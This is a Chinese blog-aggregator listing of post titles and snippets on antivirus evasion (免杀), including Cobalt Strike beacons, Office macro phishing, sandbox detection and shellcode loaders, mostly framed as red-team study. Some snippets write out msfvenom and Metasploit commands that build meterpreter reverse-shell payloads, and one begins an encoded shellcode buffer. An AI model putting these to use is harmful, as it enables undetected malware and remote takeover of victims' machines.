免杀_花指令

沙箱对抗之反沙箱技巧

前言我们经常会在红蓝对抗中遇到这种场景,离线免杀,但是10分钟又被杀,这就是云查杀的威力,而云查杀可以分为下列两种:1.静态分析2.动态分析静态分析就是分析样本的结构,导入表,等等来判定是否是恶意程序,
信安成长日记·2023-10-22 17:15

一例疑似MMCore下载器分析

这个病毒使用了分离免杀技术,有2个样本,一个加载器,一个payload。
~巴哥~·2023-10-21 22:29

论文阅读笔记-You Are What You Do: Hunting Stealthy Malware via Data Provenance Analysis

HuntingStealthyMalwareviaDataProvenanceAnalysis链接:https://www.ndss-symposium.org/wp-content/uploads/2020/02/24167-paper.pdf第一章简介1.文中介绍了现阶段的恶意软件多采用免杀技术来防范安全软件的检测
梦想闹钟·2023-10-21 11:42

Reverse入门[不断记录]

文章目录前言一、[SWPUCTF2021新生赛]re1二、[SWPUCTF2021新生赛]re2三、[GFCTF2021]wordy[花指令]四、[NSSRound#3Team]jump_by_jump
Aiwin-Hacker·2023-10-21 08:04

100天掌握网络安全知识点!

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
羊村最强沸羊羊·2023-10-20 18:58

黑客技术(网络安全)学习

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-20 06:00

安全运营工程师面经

因此几乎没怎么问八股文,主要针对项目提问,下面是一些主要的问题对中间人攻击了解不,阐述一下原理HTTPS如何防御中间人攻击,什么情况下中间人攻击依然可以再HTTPS中实现现有的流量检测方法有哪些,有什么不足免杀技术了解吗
渗透测试老鸟-九青·2023-10-19 21:14

流量代理——正向代理

流量转发工具需要放在拿到shell的服务器上可使用lcx:端口流量转发,不具备完整的proxy代理功能;部分服务端和客户端msfcobaltStrikeearthwormreGeorg:流量特征明显,可以做免杀本地的客户端可以使用
网安咸鱼1517·2023-10-18 23:31

CS 4.7 Stager 逆向及 Shellcode 一

1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,
喜欢蹲局子的小猿同学·2023-10-17 23:54

CS 4.7 Stager 逆向及 Shellcode 重写4

1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,
喜欢蹲局子的小猿同学·2023-10-17 23:53

Cobalt Strike

CobaltStrikeserver4.CobaltStrikeclient4.1安装插件4.2运行木马4.3参数详情5.CobaltStrike鱼饵制作5.1宏5.2Powershell5.3快捷方式5.4ShellQMaker免杀
来日可期x·2023-10-17 22:38

网络安全—小白自学笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-17 09:19

一次完整的渗透测试流程是这样的(下)

1)Web后门1:隐藏后门文件(将文件设置为隐藏)2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。"
学掌门·2023-10-16 21:35

端口扫描的CS木马样本的分析

序言病毒、木马是黑客实施网络攻击的常用兵器,有些木马、病毒可以通过免杀技术的加持躲过主流杀毒软件的查杀,从而实现在受害者机器上长期驻留并传播。
小道安全·2023-10-15 00:48

网络安全(黑客)技术自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-14 15:29

网络安全(黑客)自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-13 18:58

小白自学笔记—网络安全(黑客技术)

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-13 18:58

网络安全—小白学习笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-13 18:56

红队专题-工具Fscan

红队专题招募六边形战士队员简介主要功能ubuntu安装windows安装常用命令:项目框架源文件common目录Plugins目录Webscan目录爆破插件Webtitle函数webpoc扫描类型common.Scantype免杀源码特征参考链接招募六边形战士队员一起学习代码审计
amingMM·2023-10-13 15:56

红队专题-Cobalt strike 4.x - Beacon重构

红队专题招募六边形战士队员重构后Beacon适配的功能windows平台linux和mac平台C2profile重构思路跨平台功能免杀代码部分sysinfo包packet包config.go命令的执行shell
amingMM·2023-10-13 06:17

七天学习Go语言-从0到0.01

前言:(不喜欢的跳过)最近,准确的说近几年来Go语言就一直都是一个十分热门的语言,特别是对于安全圈,其实用python的脚本的一直都高过于go脚本,不过近些来也有很多奇奇怪怪的面试官喜欢问,go语言免杀
vlan911·2023-10-13 04:47

java免费代码混淆工具 支持JDK16 java加密

java代码可以反编译,因此有时候要保护自己的知识产权还真得费点心思,一般来说有三个思路:1、将class文件加密,这个是最安全的,但也费事儿,因为要将字节码混淆,打乱;2、使用花指令,使得class文件不能反编译
非著名架构师·2023-10-13 03:08

python加载shellcode免杀

1、第一个shellcode加载器importctypes#msf生成的shellcode,命令:msfvenom-ex64/xor_dynamic-i16-pwindows/x64/meterpreter_reverse_tcplhost=192.168.111.111lport=80-fpy-oshell.pybuf=b""buf+=b"\xeb\x27\x5b\x53\x5f\xb0\xe7
ctostm·2023-10-13 00:27

Android逆向——脱壳解析

许多病毒通过加壳来达到免杀的目的,但壳也用在保护正版软件不被破解。脱壳的基
Android技术栈·2023-10-12 22:07

网络安全(黑客技术)—自学手册

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
羊村最强沸羊羊·2023-10-12 14:46

Android 免杀教程

免杀练习两年半目录msfvenom自动生成自带免杀工具免杀Thefatratvenom工具小记加壳源码免杀加壳源码混淆数据通信对抗反编译反编译工具崩溃ZIP文件格式对抗AndroidManifest.xml
渗透测试老鸟-九青·2023-10-11 21:07

小白网络安全学习手册—黑客

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-10 21:57

网络安全(黑客)自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-10 21:27

网络安全(骇客)—技术学习

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-10 20:51

sqli-lab 1-16通关随笔记

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档SQL注入学习sqli-labs靶场通关1~16前段时间大概学了一遍内网,免杀正好来将web这块重新复习一遍由于是直接刷关所以只是让关卡报出注入点其余的都没搞
qianpd·2023-10-09 18:23

小白自学笔记—网络安全(黑客笔记)

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-09 17:07

网络安全(黑客技术)—小白自学笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-09 14:16

2021-8-29《内网安全攻防》第一章内网基础知识

欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注这是MS08067实验室的作品,我看的过程中做了一些笔记,算是复习+学习吧。
热热的雨夜·2023-10-08 23:03

防御第五次作业

4.恶意软件的免杀技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7.反病毒网关的工作过程是什么?8.反病毒网关的配置流程是什么?1.什么是恶意软件?
hbw_·2023-10-07 19:19

Cobalt-Strike Office宏利用与免杀

1.打开Cobalt-Strike生产Office宏病毒。首先需要设置监听器、因为钓鱼的目标比较单纯,在这里就不采用域前置技术。然后使用攻击模块,生产Office宏病毒。设置好监听器。生成宏病毒2.将宏病毒放入word首先打开Word,在审阅中编辑宏:创建新的宏:将生成的宏病毒放入MicrosoftWord目录下的ThisDocument,注意如果宏位置写错了很容易报错。按下Ctrl+S,将文件保
分发吧·2023-10-07 18:11

CobaltStrike简易免杀后门制作

事先声明:本技术文章仅限用于学习和研究,不得将上述内容用于商业或者非法用途,否则,一切后果请您自负。本博客的技术来源于作者网络上所学。您在技术复现前必须得到攻击目标本人的同意,并且在复现结束后从您的电脑中彻底删除相关内容。如有违法事件发生与作者本人无关。一.平台搭建启动CS服务器命令./teamserver服务器IP(实际要用公网服务器IP)密码客户端连接若连接不成功,需要检测是否开启50050端
天津曲艺团·2023-10-07 18:40

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS

RLO伪装图片执行利用msf生成木马x.exemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.96.128LPORT=4444-fexe-ox.exeMetasploit打开反向监听的命令useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcp下面利用RLO对x.
无名安全·2023-10-07 18:40

【黑客免杀攻防】读书笔记1 - 初级免杀基础理论(反病毒软件特征码提取介绍、免杀原理、壳)...

基础篇初级免杀技术第1章变脸免杀是一种反杀毒技术。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为
weixin_30642869·2023-10-07 18:08

绕过杀毒软件,免杀木马制作

绕过杀毒软件,免杀木马制作(以AVGAntiSpyware杀毒软件为例)一、将Sever.exe打开,分块生成100个文件二、使用AVGAntiSpyware查杀生成的文件,再二次处理,重复这个过程,直到缩小到很小的范围
youhao108·2023-10-07 18:37

远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

本专题文章导航1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2.远控免杀专题(2)-msfvenom隐藏的参数:https
Ms08067安全实验室·2023-10-07 18:37

远控免杀专题(22)-SpookFlare免杀

转载:https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
p0inter·2023-10-07 18:36

社会工程学 | office宏分离免杀及应急处置

Office宏分离免杀的方式是在目标用户的office开启宏功能的前提下,诱骗其使用office办公软件打开文档,通过加载远程的恶意宏代码,达到控制目标主机权限的目的。
betasec·2023-10-07 18:06

远控免杀专题(16)-Unicorn免杀

0x01免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
p0inter·2023-10-07 18:06

免杀对抗-反沙盒+反调试

反VT-沙盒检测-Go&Python介绍:近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说沙盒就是为运行中的程序提供的隔离环境。为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。go语言1.使用GoLan
xiaoheizi安全·2023-10-07 18:36

office钓鱼免杀宏的制作

office钓鱼免杀宏的制作由于国内近些年来,红蓝对抗的升级,各类hvv,重保,防守方上各种杀软,edr,防御手段层出不穷,不会免杀真的是欲哭无泪,今天带来EvilClippy恶意文档助手,对office
Sword-heart·2023-10-07 18:06

免杀入门学习---------2019.8.27

这篇随笔的大部分内容来自《黑客免杀攻防》第一章说的免杀的历史,点了一下免杀和Rootkit的区别。Rootkit的词条介绍当然,一个菜鸟怎么会理解呢,只能默默地记一下,接受了。
Looun·2023-10-07 18:05

免杀入门(基础理论)

免杀理论基础本文主要为免杀入门的基础理论笔记,前几年写下的找到正好发出来,因审核需要删除部分内容,有免杀基础和一定实操经验人士可以跳过本文概念免杀全称为反杀毒技术AntiAnti-Virus简称“免杀
S1aine·2023-10-07 18:35

word宏木马分离免杀

apache服务上2、修改文档“2.docx"文件名为”2.zip“,并将“2.zip”进行解压3、修改下面的文件4、将修改后的文件夹重新压缩为"2.zip",并修改后缀名为“2.docx”5、成功实现分离免杀
30岁学java的貧曾·2023-10-07 18:35

Shellcode免杀,过360、火绒、windows-Defender

我们可以使用Shellcode来完成我们需要的任务弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段Shellcode,同理,拿来干坏事的代码,也是Shellcode免杀技术为何出现如今的杀毒软件都拥有查杀病毒木马的能力
刘—手·2023-10-07 18:04

121-宏免杀

CS生成宏&上线生成宏1.cs生成宏,如下图操作2.点击复制宏代码,保存下来cs上线注:如下操作使用的是word,同样的操作也适用于Excel1.新建一个word文档,使用word打开。点击文件——2.更多——选项——3.自定义功能区——勾选开发工具——点击确定4.点击开发工具——新建宏——任意宏名——宏的位置(之前新建的word文档)——创建5.跳转到如下,将cs生成的宏代码写入——点击保存——
xiaoheizi安全·2023-10-07 18:32
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他